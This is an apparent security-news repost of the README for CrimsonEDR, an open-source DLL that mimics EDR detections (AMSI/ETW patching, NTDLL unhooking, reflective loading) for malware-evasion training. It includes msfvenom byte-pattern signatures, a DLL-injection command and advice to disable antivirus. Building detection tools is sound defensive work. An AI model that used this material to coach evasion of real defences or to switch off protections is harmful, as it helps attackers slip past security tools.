F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb PDB 

The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.

CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R
28 April 2024 at 12:30


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



❌
❌